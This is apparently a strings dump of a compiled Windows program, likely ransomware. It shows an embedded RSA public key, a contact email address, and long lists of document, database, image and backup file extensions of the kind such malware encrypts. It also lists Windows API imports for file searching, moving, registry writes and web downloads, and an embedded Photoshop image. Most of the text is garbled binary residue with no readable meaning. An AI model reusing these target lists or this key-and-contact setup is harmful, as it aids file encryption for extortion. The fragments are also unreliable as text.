G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G29G2
G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210G210
G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211G211
G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212G212
G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213G213
G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214G214
G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215G215
G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216G216
G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217G217
G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218G218
G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219G219
G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220G220
11260480087583103155720837296732476647502177064403103842104256292705175166816541194018214416526728592250885693346405631902078278799322170358825905256814075226004951445616760965330764671293592279229722
22160196743305607106649317796986454753459601233200635881921575473627110125132446168309888011818714113680056574527396080037359532723152575957056539345287927867505218040809140490765656786310534017742779
31993947586429667718985223045665309095957294692309771103410629132017241288155296515121849066713729856729622717014843950401338964253270073202610108437398060580983586681730173787303218300227076813109038
28104524796878143:65537|||3G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G33G3
G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G34G3
G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G35G3
G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G36G3
G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G37G3
G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G38G3
G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G39G3
G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310G310
G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311G311
G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312G312
G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313G313
G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314G314
G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315G315
G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316G316
G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317G317
G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318G318
G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319G319
G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320G320
vipasana4@aol.com|||KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK
CL 1.2.0.0
endend
r3d:rwl:rx2:p12:sbs:sldasm:wps:sldprt:odc:odb:old:nbd:nx1:nrw:orf:ppt:mov:mpeg:csv:mdb:cer:arj:ods:mkv:avi:odt:pdf:docx:gzip:m2v:cpt:raw:cdr:cdx:1cd:3gp:7z:rar:db3:zip:xlsx:xls:rtf:doc:jpeg:jpg:{}{}{}
psd:zip:ert:bak:xml:cf:mdf:fil:spr:accdb:abf:a3d:asm:fbx:fbw:fbk:fdb:fbf:max:m3d:dbf:ldf:keystore:iv2i:gbk:gho:sn1:sna:spf:sr2:srf:srw:tis:tbl:x3f:ods:pef:pptm:txt:pst:ptx:pz3:mp3:odp:qic:wps:{}{}{}UU
BCDLID
d"@
Error
Runtime error     at 00000000
0123456789ABCDEF
@v:k
%.*d
$p@
,p@
4p@
<p@
Dp@
Lp@
Tp@
\p@
dp@
lp@
tp@
|p@
Du@
Pv@
lx@
$y@
4z@
A,A<APA
MS Sans Serif
SBK
@I2
X!{
sbh
sAmTb
AA-
BKbhTb~XBK!;
SBK
@I2
A!;I2
0A-
{zQ
!1A
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
#3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
SBK
@I2
X!{
sbh
sAmTb
AA-
BKbhTb~XBK!;
SBK
@I2
A!;I2
0A-
{zQ
8MC
DMC
Lo@
Ln@
4p@
tp@
( D
|o@
\o@
dn@
4n@
,n@
ln@
do@
\p@
|p@
<p@
<n@
Do@
,p@
Tp@
<o@
Dp@
dp@
4o@
\n@
to@
Lp@
  D
To@
$n@
Tn@
lp@
D D
$o@
Dn@
|n@
lo@
tn@
$p@
,o@
8'D
kernel32.dll
DeleteCriticalSection
LeaveCriticalSection
EnterCriticalSection
InitializeCriticalSection
VirtualFree
VirtualAlloc
LocalFree
LocalAlloc
GetTickCount
QueryPerformanceCounter
GetVersion
GetCurrentThreadId
InterlockedDecrement
InterlockedIncrement
VirtualQuery
WideCharToMultiByte
MultiByteToWideChar
lstrlenA
lstrcpynA
LoadLibraryExA
GetThreadLocale
GetStartupInfoA
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetLastError
GetCommandLineA
FreeLibrary
FindFirstFileA
FindClose
ExitProcess
WriteFile
UnhandledExceptionFilter
SetFilePointer
SetEndOfFile
RtlUnwind
ReadFile
RaiseException
GetStdHandle
GetFileSize
GetFileType
CreateFileA
CloseHandle
user32.dll
GetKeyboardType
LoadStringA
MessageBoxA
CharNextA
advapi32.dll
RegQueryValueExA
RegOpenKeyExA
RegCloseKey
oleaut32.dll
SysFreeString
SysReAllocStringLen
SysAllocStringLen
kernel32.dll
TlsSetValue
TlsGetValue
LocalAlloc
GetModuleHandleA
advapi32.dll
RegSetValueExA
RegOpenKeyExA
RegFlushKey
RegCreateKeyExA
RegCloseKey
OpenThreadToken
OpenProcessToken
GetTokenInformation
FreeSid
EqualSid
AllocateAndInitializeSid
kernel32.dll
WriteFile
WaitForSingleObject
VirtualQuery
TerminateProcess
SizeofResource
SetFilePointer
SetEvent
SetErrorMode
SetEndOfFile
ResetEvent
ReadFile
OpenProcess
MulDiv
MoveFileA
LockResource
LoadResource
LeaveCriticalSection
InitializeCriticalSection
GlobalUnlock
GlobalReAlloc
GlobalHandle
GlobalLock
GlobalFree
GlobalAlloc
GetWindowsDirectoryA
GetVersionExA
GetTickCount
GetThreadLocale
GetTempPathA
GetSystemInfo
GetStringTypeExA
GetStdHandle
GetProcAddress
GetModuleHandleA
GetModuleFileNameA
GetLocaleInfoA
GetLocalTime
GetLastError
GetFullPathNameA
GetFileAttributesA
GetDiskFreeSpaceA
GetDateFormatA
GetCurrentThreadId
GetCurrentThread
GetCurrentProcessId
GetCurrentProcess
GetCPInfo
GetACP
FreeResource
FormatMessageA
FindResourceA
FindNextFileA
FindFirstFileA
FindClose
FileTimeToLocalFileTime
FileTimeToDosDateTime
EnumCalendarInfoA
EnterCriticalSection
DeleteCriticalSection
CreateFileA
CreateEventA
CreateDirectoryA
CompareStringA
CloseHandle
gdi32.dll
UnrealizeObject
StretchBlt
SetWinMetaFileBits
SetTextColor
SetStretchBltMode
SetROP2
SetEnhMetaFileBits
SetDIBColorTable
SetBrushOrgEx
SetBkMode
SetBkColor
SelectPalette
SelectObject
RealizePalette
PlayEnhMetaFile
PatBlt
MoveToEx
MaskBlt
GetWinMetaFileBits
GetTextMetricsA
GetSystemPaletteEntries
GetStockObject
GetPixel
GetPaletteEntries
GetObjectA
GetEnhMetaFilePaletteEntries
GetEnhMetaFileHeader
GetEnhMetaFileBits
GetDeviceCaps
GetDIBits
GetDIBColorTable
GetCurrentPositionEx
GetBrushOrgEx
GetBitmapBits
GdiFlush
DeleteObject
DeleteEnhMetaFile
DeleteDC
CreatePenIndirect
CreatePalette
CreateHalftonePalette
CreateFontIndirectA
CreateDIBitmap
CreateDIBSection
CreateCompatibleDC
CreateCompatibleBitmap
CreateBrushIndirect
CreateBitmap
CopyEnhMetaFileA
BitBlt
user32.dll
SystemParametersInfoA
ReleaseDC
MessageBoxA
LoadStringA
LoadIconA
GetSystemMetrics
GetSysColor
GetIconInfo
GetFocus
GetDC
GetClipboardData
FillRect
DrawIconEx
DestroyIcon
CreateIcon
CharNextA
CharLowerBuffA
CharToOemA
kernel32.dll
Sleep
oleaut32.dll
SafeArrayPtrOfIndex
SafeArrayGetUBound
SafeArrayGetLBound
SafeArrayCreate
VariantChangeType
VariantCopy
VariantClear
VariantInit
shell32.dll
ShellExecuteExA
ShellExecuteA
wininet.dll
InternetReadFile
InternetOpenUrlA
InternetOpenA
InternetCloseHandle
000<0\0h0l0p0t0x0|0
1!10141P1X1\1`1d1h1l1p1t1x1
2"2*222:2B2J2R2Z2b2j2r2z2
3&3.363>3F3N3V3_3
3?5
6K6^6
7Y7
7G8
:!:+:A:G:U:h:r:x:
;$;.;8;D;O;`;f;n;x;
<R<h<
>,>_>e>~>
><?D?
^0d0t0}0
1N1x1
282>2F2p2v2
3"3F3N3T3Z3
3Q4\4e4k4{4
5!5
6#6}6
7)7Z7o7|7
:6:?:
<J=\=
3$303
7 717=7
:6:K:
;O<
>.>6>L>d>r>
?C?p?y?
0i0
161?1q1x1
1+272
4$4/4[4p4
5 5$5)50565>5I5
6/696C6K6Q6_6z6
6b7k7
8o<
2F3O3
4'4*;};
;M=k=
)0:0z0
3~4
4"5K5r5
5=6_6k6r6|6
7#7J7_7p7z7
8(898J8V8[8`8g8n8x8
9&9.969>9F9N9V9^9f9n9v9~9
:&:.:6:>:F:N:V:^:f:n:v:~:
;&;.;6;>;F;N;V;^;f;n;v;~;
<&<.<6<><F<N<V<^<f<n<v<~<
=&=.=6=>=F=N=V=^=f=n=v=~=
>$>,>4><>D>L>T>\>d>l>t>|>
?$?,?4?<?D?L?T?\?d?l?t?|?
0$0,040<0D0L0T0\0d0l0t0|0
1$161<1L1d1l1x1
2(2H2P2T2X2\2`2d2h2l2p2
3 3$3(383X3`3d3h3l3p3t3x3|3
4 4$4(4,4044484H4h4p4t4x4|4
5 5$5(5,5054585<5@5T5t5|5
6$6,6064686<6@6D6H6L6\6|6
7,74787<7@7D7H7L7P7T7h7
8 8@8H8L8P8T8X8\8`8d8h8
9 949T9\9`9d9h9l9p9t9x9|9
: :$:(:,:0:H:h:p:t:x:|:
; ;(;,;0;4;8;<;@;D;H;X;x;
<,<4<8<<<@<D<H<L<P<T<
= =$=(=,=0=
2$242?2L2Q2
3k3|3
3q5
8F8z8
=!=%=)=-=1=5=9===A=E=I=M=Q=U=!>(>
0&1U1p1t1x1|1
5c6
7/8t8K9
>:>
>#?2?
1 1$1(1,101
232
3Q3f3{3]4q4
475W5h5
506_6s6
6G7
8 9
:#:h:
;Y;^;l;
;o<
=W=o=
>)>@>R>
?1?C?Z?l?
2;2@2Z2
373V3h3
4M4m4
445M5Z5s5
7:7K7T7
8]8x8
9E9
:T:k:
;!;c;
;"<)<
=%=
==>O>c>
?.?J?z?
0!0)020>0C0L0U0^0g0p0
1*1T1n1
2T2
2<3y3
4\6
6!7-7F7P7Z7l7
7'8E8b8t8
9(919L9_9r9{9
:3:A:U:s:
;3;;;X;e;&<<<t<{<
=#=(=
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2`2d2l2p2x2|2
3 3$3,30383<3D3H3P3T3\3`3h3l3t3x3
4 4(4,44484@4D4S4_4j4~4
5&515;5F5P5Z5d5n5x5
6/6S6_6l6~6
787E7n7
8F8|8
8$9Z9t9
:W:
;9;G;L;W;];b;m;s;x;
<#<(<3<9<><I<O<T<_<e<j<u<{<
=%=G>S>`>r>
? ?$?(?,?0?4?8?<?@?D?H?L?P?T?l?
0 0(0,0004080<0@0D0H0d0
1,1L1T1X1\1`1d1h1l1p1t1
2 2$2(2,2024282<2\2|2
3(3H3P3T3X3\3`3d3h3l3p3
4 4$4(4,4044484<4a4o4~4
5)5Q5_5n5
6A6O6^6u6
6)787Y7h7
8&8:8I8Z8
8)979F9]9
0x0
0(1E1}1
202e2
5!5%5)5-5155595=5A5E5I5M5Q5U5Y5]5a5e5i5=7
8-8a8z8
8:9W9
:(:1<5<9<=<A<E<I<M<Q<U<Y<]<a<e<i<m<q<u<y<}<
<Y>
021I1\1n1
2(2H2b2g293
555M5R5s5
6#6(6-636:6@6G6M6T6Z6a6g6n6
7'737@7R7
848<8@8D8H8L8P8T8X8\8p8
9,9L9T9X9\9`9d9h9l9p9t9
: :$:4:T:\:`:d:h:l:p:t:x:|:
; ;$;(;,;0;@;`;h;l;p;t;x;|;
<$<(<,<0<4<8<<<@<D<\<|<
=(=4=8=@=D=H=L=P=T=X=\=`=d=h=l=v=z=
>(>0>4>8><>@>D>H>L>P>T>X>\>`>n>
? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
0$040D0L0P0T0X0\0`0d0h0l0p0t0x0|0
1%1)1<1\1d1h1l1p1t1x1|1
2$2D2L2P2T2X2\2`2d2h2l2p2t2x2|2
343<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
4$4T4t4|4
4*595H5
8(8084888<8@8D8H8L8P8
9<:_:y:
:U;
<a<
=/=r=
>?>
>A?\?
051R1
1;2
2[3
304F4
5@5z5
5U6
6,7
7T8f8
9,9a9{9
9E:c:
;G;x;
<1<G<
<I=
=F>
?h?
0D1\1
2%2l2u3
4P5
5"6)6Z6a6
6@7
9i9p9
=P>U>|>
3#3'3+3/33373;3?3C3G3K3O3S3W3[3_3c3g3k3f4
4+6T6
7-7K7W7^7h7
8 838?8I8P8Z8a8k8x8
4&4,4@4L4`4
7+7
7t8
839v9
9k:
:0;N;_;
<@<
<<=
>.>
?S?e?n?
0B1
1K2
2o3M4
5"5
9t9
;[;
;X<
=)>I>V>
?M?[?i?w?
)161
222;2h2u2
2!3*3k3
374
5e6
7+797G7U7b7p7
:":/:k:
:C;
<&<3<z<
= >.><>J>X>f>t>
_0k0x0
0"171
152
223@3N3\3j3x3
5]6
7*7>7K7l7
8 8(80888@8H8P8X8`8h8p8x8
9,9L9T9X9\9`9d9h9l9p9t9
:T:f:l:
<(<,<4<8<<<@<D<H<L<P<T<X<\<`<h<|<
= =$=(=,=0=4=B=N=X=c=g=x=|=
>">9>=>A>\>l>|>
?"?:?>?B?\?l?|?
0 000@0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
1n1r1v1z1~1
2 2$2(2,2024282<2@2D2H2L2P2X2h2v2z2
3 3$3(3,3034383<3@3D3H3L3P3^3l3p3
4$4,4044484<4@4D4H4L4P4d4t4
5 5/535D5d5l5p5t5x5|5
6 6$6(6,6064686<6@6D6H6L6P6T6X6\6h6u6y6
7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7x7|7
:q:
2Z2w2
2J3Z3l3
3e4v4
767S7k7|7
8,8
:/:@:R:o:
:V;c;
<*=|=
>E>J>q>~>
?0?P?a?m?|?
0%0,0
0z1
2)272F2]2
3Y3
3c4
4$5u5
8I9
9e;
;]<
=5>
0 0C0
1>2
4[4
4S5
6 6
6[7m7
8 8$8(8,8084888<8@8D8H8
9+9
:V:
:/;
>n?
0v0
0w1
3K4
687O7r7
7R8B9
;4;
<_<
<T=d=t=|=
>>>Y>
0B0
0;2a2
4+6`6n6
7t8
:M;~;
;m<
={=
=M>)?N?t?
W0$1C1
3#4
5'676
7<8E9^9
9o:
:U;
;L<k=r=
081q1
576
6[7
7X8h8
9 9
:':E:z:
; ;$;(;,;
;;<G<R<\<f<u<
=%=6=B=N=_=o=y=
>#>/><>N>T>t>|>
? ?$?(?,?0?4?8?<?@?D?H?L?P?T?X?\?l?|?
40T0\0`0d0h0l0p0t0x0|0
0x1'2g2
2l3
4?4R4
6g6
727
8K9
95:
1/1
393
3c4l4
:':
5!5(5/565=5D5K5R5Y5
;#;%<,<3<:<A<
%7,7
>&>3>
9z:
;2;Z;
6Y7`7g7
0(212
N1U1
2$2X2
>E>X>w>
0h1
6"6&6*6.62666:6^6b6f6j6n6r6v6z6~6
6o:y:
<0C0J0
7&7
8 8>8
3W4[4_4c4g4k4o4
4$5+5;5r5
=6>K>t>
E0S0{0
<y<
(2t2~2
4%4;4
)1W1c1k1p1
2B2J2W2c2p2
3&3+383=3J3O3\3a3n3s3
575W5k5w5
6$6,6064686<6@6D6H6L6d6p6
7"7
8a9h9
9j:
:5;<;i;
=O=[=b=m=
>$>S>|>
?E?
070e0e1s1
272
263C3I3N3S3[3w3
7q7
8Y8
9%:<:
;";
<#<5<
<H=y=
=`?n?{?
0"1I1
4 4*424
626:6L6T6%7T7d7m7r7
7/8:8@8F8L8Q8W8]8r8
9$9D9O9d9
9$:@:
;_;
<8<F<w<
=&=4=e=~=
>">S>l>
?A?Z?y?
/0F0
0Q1
3 4.44494?4D4J4
4;5V5g5
6?6M6S6X6^6c6i6
7_7
<#<A<Q<j<
<y=k>
>'?
0$0)0v0
1A1
2c2}2
2'3S3
7#717@7e7|7
7J8Y8b8
8#9)9H9N9
:':
;u<
="=8=N=_=
?J?Z?d?j?t?y?
0"0'040E0f0n0s0
1Q1n1
3'3^3n3
4"4\4
4I5e5s5
7"7[7m7
8G:
:H;
;A<~<
<:=w=
=3>p>
>2?
0*0/0;0G0b0g0y0
1%1*1<1
3 3*303:3@3J3U3_3i3s3}3
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
5!5&50555?5D5N5S5]5b5l5q5{5
6 6%6/646>6C6M6R6\6b6g6y6
7(7-777<7F7K7U7Z7d7i7s7x7
8!8&80858?8D8N8S8]8b8l8q8{8
9 9&9+9=9G9L9V9\9a9s9
:$:3:U:_:d:y:~:
; ;%;3;8;B;H;M;_;
;><c<y<
D0H0L0T1\1`1
2 2$2(2,2024282<2@2|2
3$3L3P3T3X3\3`3d3h3l3p3t3x3|3
h7p7x7
8 8(80888@8H8P8X8`8h8p8x8
9 9(90989@9H9P9X9`9h9p9x9
9H:L:P:T:X:
H3L3P3T3`3d3h3l3p3t3x3|3
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
5 5$5(5,5054585<5@5D5H5L5P5T5X5\5`5d5h5l5p5t5x5|5
Bome
RT_RCDATA
DESK
DVCLAL
PACKAGEINFO
JFIF
Exif
Adobe Photoshop CS4 Windows
2015:12:20 19:07:17
JFIF
Adobe_CM
Adobe
AQa
B#$
b34r
cs5
TdE
Vfv
7GWgw
AQaq"
3$b
cs4
dEU6te
Vfv
'7GWgw
'1/
>I)[
)nw
?yDmB5S
vIH7;
?yL
?yO
"KH
^#r
 85
rDK
:Wo]
km5
 jd
Rmk\
)sX
_x9
TY 
V?{
C\CM
{w{k
I`g"N
w}/kS#8H
A` 
Z6a
Q^E
p6W
3Q:
nJ9
}7A
]c:x
3d>
~s}
c69
;wI
k}*
<S-+zN
+5{K
O%S!
k_x
ev>6
_kk%
T*}
X_YivM
]UU
o}N
zN%
lNm
Y?G
{w)#
?V9c
4C@
7[Pq
mh'lzm
Kr@c}v
Z,p
]n5
>K'
VqM
tzkwR{^
[UF
[,y
Yn{
^X,hakl,
7uS
Pk*
,uv-
;)x
SEu
so!
P|&#
E,-
.mT
_D{0
HO8
},og
Y`0
z.xw
"6@
2O%qJ
1ki
l;v
u\b
@Y_
H;:
ckel-k
cXv
}(c
ugl~o
SXO
+Fe
c]6m
sXC
\E!
K=f
7![
U[}
r.,
lps\w7
c}w
~hs
n.M{M
$Mqc
6UM
ke-
idT
s1}F
f,~
?MP?V
RC4
j<^
.s`
msIs
C["
#8o
3s&
k]G
lz-8X
btj
$;N>Q
3cO
VIo
W{[m$Xt
n65
lFaa
c!b
w4:
]].l;!
8L{7
,\c
RYc
vf^kC
&<=
cui
I$>
f@h
P4Ycr+
ce5
]x>o
mn'o
p$A";
%'^
UiZ
Photoshop 3.0
8BIM
8BIM
"q]8BIM
8BIM
8BIM
8BIM
8BIM
8BIM'
8BIM
/ff
lff
/ff
8BIM
8BIM
8BIM
8BIM
8BIM
8BIM
8BIM
8BIM
null
boundsObjc
Rct1
Top long
Leftlong
Btomlong
Rghtlong
slicesVlLs
Objc
slice
sliceIDlong
groupIDlong
originenum
ESliceOrigin
autoGenerated
Typeenum
ESliceType
Img 
boundsObjc
Rct1
Top long
Leftlong
Btomlong
Rghtlong
urlTEXT
nullTEXT
MsgeTEXT
altTagTEXT
cellTextIsHTMLbool
cellTextTEXT
horzAlignenum
ESliceHorzAlign
default
vertAlignenum
ESliceVertAlign
default
bgColorTypeenum
ESliceBGColorType
None
topOutsetlong
leftOutsetlong
bottomOutsetlong
rightOutsetlong
8BIM
8BIM
8BIM
8BIM
JFIF
Adobe_CM
Adobe
AQa
B#$
b34r
cs5
TdE
Vfv
7GWgw
AQaq"
3$b
cs4
dEU6te
Vfv
'7GWgw
'1/
>I)[
)nw
?yDmB5S
vIH7;
?yL
?yO
"KH
^#r
 85
rDK
:Wo]
km5
 jd
Rmk\
)sX
_x9
TY 
V?{
C\CM
{w{k
I`g"N
w}/kS#8H
A` 
Z6a
Q^E
p6W
3Q:
nJ9
}7A
]c:x
3d>
~s}
c69
;wI
k}*
<S-+zN
+5{K
O%S!
k_x
ev>6
_kk%
T*}
X_YivM
]UU
o}N
zN%
lNm
Y?G
{w)#
?V9c
4C@
7[Pq
mh'lzm
Kr@c}v
Z,p
]n5
>K'
VqM
tzkwR{^
[UF
[,y
Yn{
^X,hakl,
7uS
Pk*
,uv-
;)x
SEu
so!
P|&#
E,-
.mT
_D{0
HO8
},og
Y`0
z.xw
"6@
2O%qJ
1ki
l;v
u\b
@Y_
H;:
ckel-k
cXv
}(c
ugl~o
SXO
+Fe
c]6m
sXC
\E!
K=f
7![
U[}
r.,
lps\w7
c}w
~hs
n.M{M
$Mqc
6UM
ke-
idT
s1}F
f,~
?MP?V
RC4
j<^
.s`
msIs
C["
#8o
3s&
k]G
lz-8X
btj
$;N>Q
3cO
VIo
W{[m$Xt
n65
lFaa
c!b
w4:
]].l;!
8L{7
,\c
RYc
vf^kC
&<=
cui
I$>
f@h
P4Ycr+
ce5
]x>o
mn'o
p$A";
%'^
UiZ
8BIM
Adobe Photoshop
Adobe Photoshop CS4
8BIM
Zhttp://ns.adobe.com/xap/1.0/
<?xpacket begin="
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.2.2-c063 53.352624, 2008/07/30-18:12:18        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:tiff="http://ns.adobe.com/tiff/1.0/" xmlns:exif="http://ns.adobe.com/exif/1.0/" xmp:CreatorTool="Adobe Photoshop CS4 Windows" xmp:CreateDate="2015-12-13T11:37:50+03:00" xmp:ModifyDate="2015-12-20T19:07:17+03:00" xmp:MetadataDate="2015-12-20T19:07:17+03:00" dc:format="image/jpeg" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:8E4A2F2233A7E51185848E2BA90986D7" xmpMM:DocumentID="xmp.did:46424ACB7AA1E511AF748EA12851F4C8" xmpMM:OriginalDocumentID="xmp.did:46424ACB7AA1E511AF748EA12851F4C8" tiff:Orientation="1" tiff:XResolution="720000/10000" tiff:YResolution="720000/10000" tiff:ResolutionUnit="2" tiff:NativeDigest="256,257,258,259,262,274,277,284,530,531,282,283,296,301,318,319,529,532,306,270,271,272,305,315,33432;64EB507E0FF629807CDAEB5BB488CF77" exif:PixelXDimension="523" exif:PixelYDimension="341" exif:ColorSpace="65535" exif:NativeDigest="36864,40960,40961,37121,37122,40962,40963,37510,40964,36867,36868,33434,33437,34850,34852,34855,34856,37377,37378,37379,37380,37381,37382,37383,37384,37385,37386,37396,41483,41484,41486,41487,41488,41492,41493,41495,41728,41729,41730,41985,41986,41987,41988,41989,41990,41991,41992,41993,41994,41995,41996,42016,0,2,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,20,22,23,24,25,26,27,28,30;AAD068C45567FF76C01D8A43137C0E14"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:46424ACB7AA1E511AF748EA12851F4C8" stEvt:when="2015-12-13T12:20:47+03:00" stEvt:softwareAgent="Adobe Photoshop CS4 Windows"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:884A2F2233A7E51185848E2BA90986D7" stEvt:when="2015-12-20T19:02:56+03:00" stEvt:softwareAgent="Adobe Photoshop CS4 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:894A2F2233A7E51185848E2BA90986D7" stEvt:when="2015-12-20T19:02:56+03:00" stEvt:softwareAgent="Adobe Photoshop CS4 Windows" stEvt:changed="/"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:8D4A2F2233A7E51185848E2BA90986D7" stEvt:when="2015-12-20T19:07:17+03:00" stEvt:softwareAgent="Adobe Photoshop CS4 Windows" stEvt:changed="/"/> <rdf:li 